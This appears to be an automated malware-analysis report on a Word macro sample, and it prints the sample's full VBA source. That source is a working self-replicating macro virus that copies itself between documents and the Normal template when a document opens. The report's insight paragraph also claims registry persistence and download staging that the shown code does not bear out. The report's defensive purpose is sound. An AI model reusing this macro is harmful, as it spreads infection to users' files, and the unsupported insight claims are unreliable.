MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code when a document is opened. The script modifies the Normal template and the active document, and the embedded string "Çäåñü áîëüøå íå æèâóò è æèòü íå áóäóò" is likely a marker or part of the malicious payload. The presence of a Document_Open macro and modifications to templates strongly suggests an attempt to establish persistence or prepare for a second-stage download.
Heuristics 3
-
ClamAV: Doc.Trojan.Wicked-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Wicked-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1517 bytes |
SHA-256: e3aebe7d94f34a673f12ec33e77a06009cca50fe70db15935ef3b71abb20c9a0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const flag = "Çäåñü âèðóñîâ íåò"
Private Sub Document_Open()
Set x1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set x2 = NormalTemplate.VBProject.VBComponents.Item(1)
x3 = x1.CodeModule.Find(flag, 1, 1, 10000, 10000)
x4 = x2.CodeModule.Find(flag, 1, 1, 10000, 10000)
If x4 = False Then
x11 = x1.CodeModule.Lines(1, x1.CodeModule.CountOfLines)
x2.CodeModule.DeleteLines 1, x2.CodeModule.CountOfLines
x2.CodeModule.AddFromString x11
With Dialogs(wdDialogFileSummaryInfo): .Title = "": .Subject = "": .Author = "Äîáðûé äîêòîð Àéáîëèò": .Keywords = "": .Comments = "Çëûå âèðóñû çäåñü áîëüøå íå æèâóò è æèòü íå áóäóò": .Execute: End With
NormalTemplate.Save
End If
If x3 = False Then
x11 = x2.CodeModule.Lines(1, x2.CodeModule.CountOfLines)
x1.CodeModule.DeleteLines 1, x1.CodeModule.CountOfLines
x1.CodeModule.AddFromString x11
With Dialogs(wdDialogFileSummaryInfo): .Title = "": .Subject = "": .Author = "Äîáðûé äîêòîð Àéáîëèò": .Keywords = "": .Comments = "Çëûå âèðóñû çäåñü áîëüøå íå æèâóò è æèòü íå áóäóò": .Execute: End With
ActiveDocument.Save
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.